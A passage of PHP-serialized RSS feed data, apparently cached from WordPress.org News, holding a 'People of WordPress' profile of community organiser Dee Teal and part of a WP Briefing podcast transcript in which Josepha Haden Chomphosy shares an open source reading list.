\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:29:\"People of WordPress: Dee Teal\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:64:\"https://wordpress.org/news/2022/05/people-of-wordpress-dee-teal/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 31 May 2022 17:51:53 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:6:{i:0;a:5:{s:4:\"data\";s:9:\"Community\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:8:\"Features\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:7:\"General\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:3;a:5:{s:4:\"data\";s:10:\"Interviews\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:4;a:5:{s:4:\"data\";s:9:\"HeroPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:5;a:5:{s:4:\"data\";s:19:\"People of WordPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"https://wordpress.org/news/?p=12946\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:90:\"This month\'s People of WordPress feature shares the story of Dee Teal, based in Australia.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"webcommsat AbhaNonStopNewsUK\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:14883:\"\n<p>In this series, we share some of the inspiring stories of how WordPress and its global network of contributors can change people&#8217;s lives for the better. This month we feature a WordPress development and large project specialist on the difference the software and community can make to your career and life.</p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"1024\" height=\"515\" src=\"https://i2.wp.com/wordpress.org/news/files/2022/05/Dee-Teal.jpg?resize=1024%2C515&#038;ssl=1\" alt=\"\" class=\"wp-image-12955\" srcset=\"https://i2.wp.com/wordpress.org/news/files/2022/05/Dee-Teal.jpg?resize=1024%2C515&amp;ssl=1 1024w, https://i2.wp.com/wordpress.org/news/files/2022/05/Dee-Teal.jpg?resize=300%2C151&amp;ssl=1 300w, https://i2.wp.com/wordpress.org/news/files/2022/05/Dee-Teal.jpg?resize=768%2C386&amp;ssl=1 768w, https://i2.wp.com/wordpress.org/news/files/2022/05/Dee-Teal.jpg?w=1247&amp;ssl=1 1247w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" data-recalc-dims=\"1\" /></figure>\n\n\n\n<p>Dee’s story with computers started at school in New Zealand where discovering how a mouse worked and learning BASIC and Pascal was a catalyst for what later became a programming career.</p>\n\n\n\n<p>At a time when computers were just becoming mainstream, there were no opportunities for girls in her school to consider this as a further option. She recalls: “No one thought to say, ‘Dee, you look like you’re good at this, you should pursue it…’. I mean, I was a girl (and I was told girls didn’t ‘do’ computers). No one in the circles I moved in really had any idea where this technology revolution would take us.”</p>\n\n\n\n<p>With no particular career path into technology, Dee was encouraged in her final year of school to apply for a job in a bank where she worked and became a teller three years later. She gained financial independence, which enabled her to travel as a 20-year-old and spend the next three years exploring the US and Europe.</p>\n\n\n\n<p>Looking back, she noted how the world had changed: the first computer mouse she had seen had come out in 1983, and 20 years later WordPress was founded.</p>\n\n\n\n<h2>Journey into coding</h2>\n\n\n\n<p>During those 20 years, Dee worked as a nanny, working in child care centers, in customer support, and as a temp.</p>\n\n\n\n<p>In 1999, she packed up her bags once again, and moved from New Zealand to Australia. She took a place at a performing arts school where she honed her singing and performance skills and volunteered her time to the music director who was starting to experiment with sending out HTML newsletters and updates via email.</p>\n\n\n\n<p>“And so my personal revolution began. On the day after I graduated from that course, I walked into a full-time role as that music director’s assistant and began my journey back to code.”</p>\n\n\n\n<p>As part of that job, Dee edited and sent HTML newsletters on a weekly basis. This ignited her interest in programming, and she bought books about coding for the web and experimented on her home-built PC making web pages. </p>\n\n\n\n<blockquote class=\"wp-block-quote\">\n<p>“I’m sure, like a lot of us, I remember the thrill of creating that first HTML file and seeing a ‘Hello World’ or similar heading rendered in the browser. From there, I was completely hooked.”</p>\n<cite>Dee Teal</cite></blockquote>\n\n\n\n<p>Later she moved to the IT department and took on maintenance of all the websites. By 2004, she was working full-time as a webmaster. A year later, she was running a small business creating sites on the side. Four years after that, her business became her full-time job as she left employment to pursue her Masters Degree in Digital Communication and Culture.</p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"1024\" height=\"768\" src=\"https://i0.wp.com/wordpress.org/news/files/2022/05/R0011864.jpg?resize=1024%2C768&#038;ssl=1\" alt=\"Dee with other contributors getting things ready for a WordCamp\" class=\"wp-image-12961\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2022/05/R0011864.jpg?resize=1024%2C768&amp;ssl=1 1024w, https://i0.wp.com/wordpress.org/news/files/2022/05/R0011864.jpg?resize=300%2C225&amp;ssl=1 300w, https://i0.wp.com/wordpress.org/news/files/2022/05/R0011864.jpg?resize=768%2C576&amp;ssl=1 768w, https://i0.wp.com/wordpress.org/news/files/2022/05/R0011864.jpg?w=1200&amp;ssl=1 1200w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" data-recalc-dims=\"1\" /><figcaption class=\"wp-element-caption\">Dee and other volunteers setting up for a local WordCamp</figcaption></figure>\n\n\n\n<p>Dee found the theory and sociology behind the web, and its facilitation of human and machine communication fascinating.</p>\n\n\n\n<p>She said: “I love the fact that the tech industry involves a constant constant curve of growth and discovery, which results in a perpetual exercise in finding creative elegant solutions for sticky problems.”</p>\n\n\n\n<p>For Dee, being able to use her innate curiosity to leverage processes, people, and tools, fuelled by a focus on communicating a message, has been a defining inspiration in her work.</p>\n\n\n\n<p>This combined fascination coincided with her meeting WordPress in 2009 and subsequently its community. She moved her existing blog to the software and it became the CMS of choice for all her client work.</p>\n\n\n\n<h2>The WordPress community can change your world</h2>\n\n\n\n<p>In 2011, she stumbled across WordCamps and by extension the WordPress community. Dee has reflected publicly that WordPress didn’t change her life, its community changed her world!</p>\n\n\n\n<p>She flew on a whim from her then home in Sydney to attend a WordCamp in Melbourne she had found after a search for ‘WordPress Conferences’.</p>\n\n\n\n<p>She said: “I met welcoming people, made friends, connected, and came back home excited and hopeful about continuing this connection with the wider WordPress community.”</p>\n\n\n\n<p>Building a community locally around WordPress got off to a slow start in Sydney. From an inauspicious early WordPress Sydney meetup in the function room of a pub, her connection and involvement took off. Before long she was helping organize that meetup, and by the time she moved away from that great city it had branched into two meetups, and soon after, into three.</p>\n\n\n\n<p>She was so inspired by the community that at the end of that first year and her second WordCamp, she raised her hand to help organize a WordCamp Sydney in 2012, and after moving interstate, WordCamp Melbourne in 2013.</p>\n\n\n\n<blockquote class=\"wp-block-quote\">\n<p>&#8220;WordPress and any other software package exist to serve people.&#8221;</p>\n<cite>Dee Teal</cite></blockquote>\n\n\n\n<p>Dee said: “WordPress, software, technology, the Internet will come and go, morph, and change, evolve. Maybe WordPress will last forever, maybe it will morph into something else, maybe one day it will look completely different than it did when I first started (actually, that’s true now). The thing that doesn’t change is the humanity around it. WordPress and any other software package exist to serve people.”</p>\n\n\n\n<p>She added: “The thing that I have learned, not only through WordPress but in life, is that if we too serve the people around what we’re doing, we ourselves will grow, develop and change alongside the people we serve, and the tools we use to serve them.”</p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"1024\" height=\"329\" src=\"https://i0.wp.com/wordpress.org/news/files/2022/05/Dee_POW_5.6_slice-large.png?resize=1024%2C329&#038;ssl=1\" alt=\"Dee pictured second from left as part of the WordPress 5.6 contributors\" class=\"wp-image-12957\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2022/05/Dee_POW_5.6_slice-large.png?resize=1024%2C329&amp;ssl=1 1024w, https://i0.wp.com/wordpress.org/news/files/2022/05/Dee_POW_5.6_slice-large.png?resize=300%2C96&amp;ssl=1 300w, https://i0.wp.com/wordpress.org/news/files/2022/05/Dee_POW_5.6_slice-large.png?resize=768%2C246&amp;ssl=1 768w, https://i0.wp.com/wordpress.org/news/files/2022/05/Dee_POW_5.6_slice-large.png?w=1200&amp;ssl=1 1200w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" data-recalc-dims=\"1\" /><figcaption class=\"wp-element-caption\">Some of the contributors to the <em>WordPress 5.6 release</em> </figcaption></figure>\n\n\n\n<p>Dee was a coordinator for WordPress 5.6 release in 2020 and was able to encourage others to learn about the process.</p>\n\n\n\n<h2>Helping others and sharing knowledge through WordPress</h2>\n\n\n\n<p>Dee has been an advocate for cross-cultural collaboration and understanding in both WordPress and her work for a large distributed agency which has people from more than 24 countries and operates across 16 timezones. She has also written about closing the gap between diverse distributed teams and how to meet the challenges of cross cultural remote work.</p>\n\n\n\n<p>Dee has given talks at WordCamps, including at WordCamp Europe in 2019, on developing ourselves, our relationships, and our communities in increasingly diverse environments.</p>\n\n\n\n<p>With a strong desire to share her professional knowledge and experience, Dee hopes her involvement in the WordPress community from being part of a Release Squad in the Core Team, and volunteering in the community through organizing and speaking at WordCamp events, will inspire others to get involved.</p>\n\n\n\n<blockquote class=\"wp-block-quote\">\n<p>&#8220;It’s the connections, it’s the friendships. It’s the network of work, referrals, support, help and encouragement.&#8221;</p>\n<cite>Dee Teal talking about the community that makes WordPress specialbenefits of the WordPress community</cite></blockquote>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"1024\" height=\"576\" src=\"https://i1.wp.com/wordpress.org/news/files/2022/05/dee-wceu2019.png?resize=1024%2C576&#038;ssl=1\" alt=\"Dee Teal\'s talk at WordCamp Europe 2019 on \'Working a world apart\'\" class=\"wp-image-12958\" srcset=\"https://i1.wp.com/wordpress.org/news/files/2022/05/dee-wceu2019.png?resize=1024%2C576&amp;ssl=1 1024w, https://i1.wp.com/wordpress.org/news/files/2022/05/dee-wceu2019.png?resize=300%2C169&amp;ssl=1 300w, https://i1.wp.com/wordpress.org/news/files/2022/05/dee-wceu2019.png?resize=768%2C432&amp;ssl=1 768w, https://i1.wp.com/wordpress.org/news/files/2022/05/dee-wceu2019.png?resize=1536%2C864&amp;ssl=1 1536w, https://i1.wp.com/wordpress.org/news/files/2022/05/dee-wceu2019.png?w=1920&amp;ssl=1 1920w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" data-recalc-dims=\"1\" /><figcaption class=\"wp-element-caption\"><em>Dee shared her experience with attendees at WordCamp Europe 2019</em></figcaption></figure>\n\n\n\n<p>In contributing to WordPress and organizing community events around it, Dee found that for her: “At the end of the day it isn’t actually WordPress that matters. It’s those connections, it’s the friendships. It’s the network of work, referrals, support, help, encouragement that has kept me wired into this community and committed to helping other people find that connection and growth for themselves.”</p>\n\n\n\n<p>Dee’s career in WordPress has moved through coding, into project management of large scale WordPress projects, and now into delivery leadership. Her connections to community have helped &#8216;fuel the transitions&#8217; through these chapters of her life.</p>\n\n\n\n<p>She said: “I believe that the place I’ve found and the opportunities I have had owe as much to my own desire and ambition as they do to the help, support and belief of the community around me; sometimes even more than I’ve felt in myself.”</p>\n\n\n\n<p>She feels that she is ‘living proof’ that by helping, connecting, and resourcing other people, you can be helped, resourced and connected into places you had never thought possible.</p>\n\n\n\n<p>This has enabled her to reach and have a career in technology that she did not know existed as a teenager playing with that first computer mouse and experimenting with code. Dee hopes her story will inspire others in their journey.</p>\n\n\n\n<h2>Share the stories</h2>\n\n\n\n<p>Help share these stories of open source contributors and continue to grow the community. Meet more WordPressers in the <a href=\"https://wordpress.org/news/category/newsletter/interviews/\">People of WordPress series</a>.</p>\n\n\n\n<h2>Contributors</h2>\n\n\n\n<p>Thanks to Abha Thakor (<a href=\'https://profiles.wordpress.org/webcommsat/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>webcommsat</a>), Meher Bala (<a href=\'https://profiles.wordpress.org/meher/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>meher</a>), Chloe Bringmann (<a href=\'https://profiles.wordpress.org/cbringmann/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>cbringmann</a>), Nalini Thakor (<a href=\'https://profiles.wordpress.org/nalininonstopnewsuk/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>nalininonstopnewsuk</a>), and Larissa Murillo (<a href=\'https://profiles.wordpress.org/lmurillom/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>lmurillom</a>) for work on this feature. Thank you to Josepha Haden (<a href=\'https://profiles.wordpress.org/chanthaboune/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>chanthaboune</a>) and Topher DeRosia (<a href=\'https://profiles.wordpress.org/topher1kenobe/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>topher1kenobe</a>) for support of the series. Thank you too to <a href=\'https://profiles.wordpress.org/thewebprincess/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>thewebprincess</a> for sharing her experiences.</p>\n\n\n\n<p>This article is inspired by an article originally published on HeroPress.com, a community initiative created by Topher DeRosia. It highlights people in the WordPress community who have overcome barriers and whose stories would otherwise go unheard.<br>Meet more WordPress community members in our People of WordPress series.</p>\n\n\n\n<div class=\"wp-block-media-text is-stacked-on-mobile is-vertically-aligned-center\" style=\"grid-template-columns:29% auto\"><figure class=\"wp-block-media-text__media\"><img decoding=\"async\" loading=\"lazy\" width=\"180\" height=\"135\" src=\"https://i1.wp.com/wordpress.org/news/files/2020/03/heropress_logo_180.png?resize=180%2C135&#038;ssl=1\" alt=\"HeroPress logo\" class=\"wp-image-8409 size-full\" data-recalc-dims=\"1\" /></figure><div class=\"wp-block-media-text__content\">\n<p class=\"has-small-font-size\"><em>This People of WordPress feature is inspired by an essay originally published on </em><a href=\"https://heropress.com/\"><em>HeroPress.com</em></a><em>, a community initiative created by Topher DeRosia. It highlights people in the WordPress community who have overcome barriers and whose stories might otherwise go unheard. </em>#HeroPress </p>\n</div></div>\n\n\n\n<p></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"12946\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:28;a:6:{s:4:\"data\";s:61:\"\n		\n		\n		\n		\n		\n				\n		\n		\n\n					\n										\n					\n		\n		\n\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:52:\"WP Briefing: Episode 32: An Open Source Reading List\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:74:\"https://wordpress.org/news/2022/05/episode-32-an-open-source-reading-list/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 30 May 2022 17:00:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:7:\"Podcast\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:11:\"wp-briefing\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:53:\"https://wordpress.org/news/?post_type=podcast&p=12940\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:448:\"In the thirty-second episode of the WordPress Briefing, WordPress Executive Director Josepha Haden Chomphosy shares her open source reading list for that post-WordCamp Europe downtime. Have a question you&#8217;d like answered? You can submit them to wpbriefing@wordpress.org, either written or as a voice recording. Credits Editor:&#160;Dustin Hartzler Logo:&#160;Beatriz Fialho Production:&#160;Santana Inniss and Chloé Bringmann Song: [&#8230;]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:9:\"enclosure\";a:1:{i:0;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:1:{s:0:\"\";a:3:{s:3:\"url\";s:60:\"https://wordpress.org/news/files/2022/05/WP-Briefing-032.mp3\";s:6:\"length\";s:1:\"0\";s:4:\"type\";s:0:\"\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Santana Inniss\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:11975:\"\n<p>In the thirty-second episode of the WordPress Briefing, WordPress Executive Director Josepha Haden Chomphosy shares her open source reading list for that post-WordCamp Europe downtime. <br></p>\n\n\n\n<p><em><strong>Have a question you&#8217;d like answered? You can submit them to <a href=\"mailto:wpbriefing@wordpress.org\">wpbriefing@wordpress.org</a>, either written or as a voice recording.</strong></em></p>\n\n\n\n<h2 id=\"credits\">Credits</h2>\n\n\n\n<ul><li>Editor:&nbsp;<a href=\"https://profiles.wordpress.org/dustinhartzler/\">Dustin Hartzler</a></li><li>Logo:&nbsp;<a href=\"https://profiles.wordpress.org/beafialho/\">Beatriz Fialho</a></li><li>Production:&nbsp;<a href=\"https://profiles.wordpress.org/santanainniss/\">Santana Inniss</a> and <a href=\"https://profiles.wordpress.org/cbringmann/\">Chloé Bringmann</a></li><li>Song: Fearless First by Kevin MacLeod</li></ul>\n\n\n\n<h2>References</h2>\n\n\n\n<ul><li><a href=\"https://producingoss.com/en/index.html\">Producing Open Source Software</a>, Karl Fogel</li><li><a href=\"https://www.amazon.com/dp/B08BDGXVK9/ref=dp-kindle-redirect?_encoding=UTF8&amp;btkr=1\">Working in Public: The Making and Maintenance of Open Source Software</a>, Nadia Eghbal</li><li><a href=\"https://www.amazon.com/CODE-Collaborative-Ownership-Digital-Leonardo/dp/0262572362\">Collaborative Ownership and the Digital Economy</a>, ed Rishab Aiyer Ghosh, Roger F. Malina PhD, Sean Cubitt</li><li><a href=\"https://www.amazon.com/Humble-Inquiry-Second-Relationships-Organizations/dp/B08VCRL6WQ/ref=sr_1_1?crid=39U1NLFRD52VO&amp;keywords=Humble+Inquiry&amp;qid=1653587884&amp;s=books&amp;sprefix=humble+inquiry%2Cstripbooks%2C63&amp;sr=1-1\">Humble Inquiry</a>, Edgar H. Schein (Author), Peter A. Schein</li><li><a href=\"https://github.com/WordPress/book/\">WordPress Milestones</a></li><li><a href=\"https://europe.wordcamp.org/2022/\">WordCamp Europe 2022</a></li><li><a href=\"https://wp.me/p2U65r-9f3\">2022 Annual Meetup Survey</a></li></ul>\n\n\n\n<h2>Transcript</h2>\n\n\n\n<span id=\"more-12940\"></span>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:00:00]&nbsp;</strong></p>\n\n\n\n<p>Hello everyone. And welcome to the WordPress Briefing. The podcast where you can catch quick explanations of some of the ideas behind the WordPress open source project and the community around it. As well as get a small list of big things coming up in the next two weeks. I&#8217;m your host Josepha Haden Chomphosy. Here we go!</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:00:40]&nbsp;</strong></p>\n\n\n\n<p>With the approach of various mid-year breaks and the prospect of wandering off for some safe, restorative travel, I&#8217;ve been updating my to-read and re-read list. As I was looking at the queued books for my Northern hemisphere summer, there were some common threads, mostly around leadership, but there&#8217;s also like a chunk that&#8217;s about cross-cultural group theory and economics, and then like some beach reads, but there&#8217;s one group in particular that you all might find interesting.</p>\n\n\n\n<p>And that&#8217;s a group that&#8217;s sort of like a back-to-FOSS basics list. So I&#8217;ll share my top few with you in case you want to pack a copy for your next getaway.&nbsp;</p>\n\n\n\n<p>The first one on our list is called Producing Open Source Software by Karl Fogel. I think everyone who contributes to FOSS projects has received this as one of their first recommendations. Like, y&#8217;all are building open software? Excellent, you need to read Producing Open Source Software. Like, that is just a sentence that comes out of everyone&#8217;s mouths. So this was one of the first open source books that was recommended to me when I joined the WordPress community. It was freshly revised in 2020, and I haven&#8217;t given it a read since then, which is why it is on my reread list this year.</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:01:54]</strong></p>\n\n\n\n<p>However, it shaped the early days of the WordPress project’s leadership, and their lead developers, and some of WordPress&#8217;s basic philosophies. It&#8217;s all available online, under a creative commons, ShareAlike license. And so it&#8217;s worth the read. I&#8217;ll put a link to it in the show notes so it&#8217;s easy for everyone to find in the event that is your preferred beach read.</p>\n\n\n\n<p>The second one on this list is a book from Nadia Eghbal. She wrote the excellent Roads and Bridges report that also is probably not light beach reading, but you know, this one is on my list to read this summer because Eghbal always delivers truths about the reality of maintaining popular software, popular, open source software, in a way that&#8217;s easy for me to access and process rather than getting paralyzed by the enormity of it all.</p>\n\n\n\n<p>For what it&#8217;s worth your mileage may vary on that. I realized that, like, I live and breathe open source stuff. And so just because I am not paralyzed by the enormity of her explanations of things doesn&#8217;t necessarily mean that you will have a similar experience. And so I&#8217;m just going to claim that elephant in the room for all of us.</p>\n\n\n\n<p>However, if you only read one book on this list this year, I think that this should be the one that you read.</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:03:14]</strong></p>\n\n\n\n<p>The third one is called Code: Collaborative Ownership and the Digital Economy. It was edited by Rishab Aiyer Ghosh. I am certain that I butchered that name. And so I apologize on my own behalf to everyone that knows whether or not I said it correctly.</p>\n\n\n\n<p>This book focuses on intellectual property rights and the original purpose of having anything like copyright in the world. So, right up my alley! The writers who contributed to this work promise exploration of the plight of creativity in the commons, the role of sharing in creative advancement, and a concept of what it would look like if intellectual property were to mean the second closing of an ecosystem versus a triumph of the commons.</p>\n\n\n\n<p>I mean, obviously, this one is very light reading. You can take this topic to high tea and everyone will not know what you&#8217;re talking about. However, this one looks like a really interesting book to me and I am just super ready to read it.&nbsp;</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:04:19]</strong></p>\n\n\n\n<p>The second to last one on the list is a book called Humble Inquiry.</p>\n\n\n\n<p>This is a new-to-me book that seems right in line with one of my favorite books to recommend to leaders in the open source space. From reviews of it, I have gathered that it takes a hard look at the value of listening and asking for clarification in a world that puts a high value on an unsolicited hot take.</p>\n\n\n\n<p>It puts the importance of high trust relationship building, which is at the heart of any cross-culturally aware organization. And for folks who&#8217;ve been working with me for a while, you know, that relationship building is an important part of my leadership expectations for myself. So it puts relationship building at the front and center with a promise of practical applications for everyday life.</p>\n\n\n\n<p>And if you ever have tried to tackle a complicated topic like this, you know that practical applications are really hard to come by and it&#8217;s often hard to understand it if you don&#8217;t have those practical applications. And so that is why this one is on my read and reread list this year.&nbsp;</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:05:24]</strong></p>\n\n\n\n<p>And then finally the WordPress Milestones book.</p>\n\n\n\n<p>So this sounds like a shameless plug for WordPress. And on the one hand, this whole podcast is about WordPress. And so, yes! But on the other hand, I actually am reading this for two specific reasons. I&#8217;m rereading this actually. I read it when I first joined Automattic. And so the first of the two reasons that I&#8217;m rereading it this year is that volume two of this is, like the second decade of WordPress currently, being researched and written in preparation for WordPress’s 20th birthday next year.&nbsp;</p>\n\n\n\n<p>So I am rereading this to kind of get that all back in my mind as that work is getting done. And the second reason is that I honestly like to remind myself of how far we&#8217;ve come sometimes. I talk about our work frequently. And I talk about what we&#8217;re working on right now, all the time.</p>\n\n\n\n<p>I talk about what we&#8217;re looking at three years from now, five years from now. The biggest concerns of today, tomorrow, and the future-future. And it&#8217;s very easy to forget how much success WordPress has had and how much growth the contributors that support us have had over the course of our long and storied history.</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:06:40]</strong></p>\n\n\n\n<p>And so I like to go back to that just to kind of give myself some grounding in our progress, as well as get some concept for how we can move forward together. So that one is also available online. Also under a creative commons ShareAlike license and it is also worth the read. I will share a link to that with the other one in the show notes as well.</p>\n\n\n\n<p>That brings us now to our small list of big things. Let&#8217;s see what we got in the old lineup today.&nbsp;</p>\n\n\n\n<p>So, firstly WordCamp Europe is happening this week and it&#8217;s possible to watch the live stream from the comfort of your own home. There are some smart and talented speakers at the event. So I encourage you to catch a few if you have the time. I&#8217;ll include a link to the live stream information in the show notes below, and then also you can always keep an eye out on Twitter.&nbsp;</p>\n\n\n\n<p>There will be a lot of discussions, a lot of conversation there. And so you can engage with folks that are there at the time and catch up on those conversations, catch up on those presentations in your own time, as it fits into your day.</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:07:50]</strong></p>\n\n\n\n<p>The second thing is that WordPress’s community team is preparing the annual meetup survey right now. So if you participate in meetup events, keep an eye out for that because your feedback helps us to make plans to improve that program so that it works better for you. And it helps you to learn WordPress better and feel more confident with what you are taking out into the world that way.</p>\n\n\n\n<p>But, if you are wanting to use this as a chance to contribute, we actually will need folks who are able to translate the surveys as well. So I&#8217;ll leave a link to some information about that in the show notes. If all of that stuff about contribution didn&#8217;t make any sense, then just like keep an eye out from your meetup organizer and they will make sure that you have that survey so that you can have your voice heard.&nbsp;</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:08:33]</strong></p>\n\n\n\n<p>And then item three is less of an item. I mean, it&#8217;s an item cause it&#8217;s in this list, but it&#8217;s less of, like, a thing to know and more of a general thing to be aware of. It&#8217;s a general awareness item. There&#8217;s a lot going on in WordPress right now. I can see how hard it is to keep track of some of these things these days.</p>\n\n\n\n<p>And I know as someone who&#8217;s looking at this all day every day that, yeah, it&#8217;s a lot. And it&#8217;s hard to get your bearings. So if you have a team that you contribute to already, don&#8217;t forget to reach out to each other, just to check-in. Sometimes we don&#8217;t think to ask for help. Sometimes we don&#8217;t think to offer help and you know, if no one needs any help from you at that moment, a little hello also can brighten someone&#8217;s day.</p>\n\n\n\n<p>And that, my friends, is your smallest of big things. Thank you for tuning in today for the WordPress Briefing. I&#8217;m your host, Josepha Haden Chomphosy. And I&#8217;ll see you again in a couple of 